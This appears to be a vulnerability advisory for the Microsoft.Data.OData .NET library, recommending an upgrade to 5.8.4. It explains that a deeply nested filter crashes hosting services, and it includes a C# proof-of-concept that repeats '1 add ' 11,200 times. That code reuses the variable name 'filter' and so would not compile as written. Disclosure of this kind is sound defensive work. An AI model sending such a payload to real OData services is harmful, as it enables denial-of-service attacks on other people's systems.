Microsoft.Data.OData
version 5.8.3 and below
Upgrade to version 5.8.4
The library Microsoft.Data.OData is used for handling OData V1-3 requests.
It is used by many applications and services that expose OData API, including SharePoint Server and Azure Active Directory Graph API.
it has ~ 30,000,000 downloads in Nuget (.NET package manager).
A core functionality of the library is parsing an OData filter.
Parsing a crafted OData filter using this library, results in deep recursion which leads to Stack Overflow exception and crash of the hosting process.
An application that uses this library to provide OData API might be vulnerable to DOS attack. An attacker can shut down the application remotely by sending a crafted request few times.
Information about the exploitation of the vulnerability can be found in our blog post.
The following program demonstrates how a crafted filter can be used to initiate StackOverflowException
using System.Linq;
using Microsoft.Data.Edm.Library;
using Microsoft.Data.OData.Query;
using Microsoft.Data.OData.Query.SemanticAst;
namespace TestOdata
{
class Program
{
static void Main(string[] args)
{
EdmModel model = new EdmModel();
var customer = new EdmEntityType("TestModel", "TestModel");
//Generate the filter – "1 add 1 add 1 add 1 add ......"
string filter = string.Concat(Enumerable.Repeat("1 add ", 11200)) + "1";
//Following function will throw StackOverflowException
FilterClause filter = ODataUriParser.ParseFilter(filter, model, customer);
}
}
}